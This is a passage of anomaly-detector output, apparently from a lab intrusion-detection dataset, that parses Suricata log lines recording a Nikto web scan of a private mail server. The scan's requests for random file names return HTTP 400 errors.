"{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30115, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.www_acl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.www_acl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46902, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2081933841044299,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2081933841044299, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.301150+0000\",\"flow_id\":2081933841044299,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46902,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.www_acl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.www_acl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80", "/parser/model/time": 1583349514.303601, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol 
Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46904, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.303601 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46904 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ca", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.303839, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ca\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ca", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46904, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1429962100481725,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1429962100481725, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.303839+0000\",\"flow_id\":1429962100481725,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46904,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ca\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ca\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80", "/parser/model/time": 1583349514.305461, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46906, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.305461 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46906 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.fhp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.30569, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.fhp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.fhp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46906, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1947518544553551,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1947518544553551, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.305690+0000\",\"flow_id\":1947518544553551,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46906,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.fhp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.fhp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.307690 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46908 -> 192.168.10.154:80", "/parser/model/time": 1583349514.30769, "/parser/model/brack_str1": "] {", 